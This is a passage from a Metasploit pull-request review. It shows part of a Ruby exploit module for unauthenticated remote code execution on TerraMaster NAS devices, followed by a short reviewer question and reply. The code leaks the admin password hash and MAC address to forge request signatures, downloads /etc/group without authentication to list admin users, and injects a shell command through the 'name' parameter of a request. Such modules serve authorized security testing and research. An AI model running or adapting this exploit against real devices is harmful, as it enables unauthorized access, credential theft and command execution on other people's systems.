modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb

```diff
@@ -0,0 +1,287 @@
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'User-Device' => 'TNAS'
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split("\n")[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
+        @data['key'] = @data['mac'][6..11] # last three MAC address entries
+        @data['timestamp'] = Time.new.to_i.to_s
+        # derive signature
+        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])
+      end
+    end
+  end
+
+  def tos_encrypt_str(key, str_to_encrypt)
+    id = key + str_to_encrypt
+    return Digest::MD5.hexdigest(id.encode('utf-8'))
+  end
+
+  def download_admin_users
+    # Initialise instance variable admin_users to store the admin users from /etc/group
+    @admin_users = []
+
+    # Download /etc/group information to find all the admin users belonging to the group admin.
+    # Using endpoint module/api.php?mobile/fileDownload as user guest allows to download the file without authentication.
+    # CVE-2021-45841
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/fileDownload'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => "kod_name=guest; kod_token=#{tos_encrypt_str(@data['key'], '')}",
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'User-Device' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp']
+      },
+      'vars_post' => {
+        'path' => '/etc/group'
+      }
+    })
+    # get the admin users from /etc/group
+    if res && res.code == 200 && res.body.include?('admin')
+      res.body.each_line do |line|
+        field = line.split(':')
+        next unless field[0] == 'admin'
+
+        @admin_users = field[3].strip.split(',')
+        break
+      end
+    end
+  end
+
+  def get_session
+    # Use session crafting to iterate thru the list of admin users to gain a session.
+    # We will send two request per admin user. First request is a dummy request to obtain the session-id.
+    # This session-id will be used to send the second request that will execute the echo command with marker.
+    # if the response contains the marker, then the session has been successfully established.
+    # CVE-2021-45837
+    session = false
+    marker = Rex::Text.rand_text_alphanumeric(8..16)
+    for admin in @admin_users
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;echo${IFS}#{marker};xx%23"),
```

Comment:
Is the `xx` required?

Reply:
Nope. Removed from the payload. See https://github.com/rapid7/metasploit-framework/pull/18070/commits/46fcdb76d5f9da9f368e30692d86873bba97416a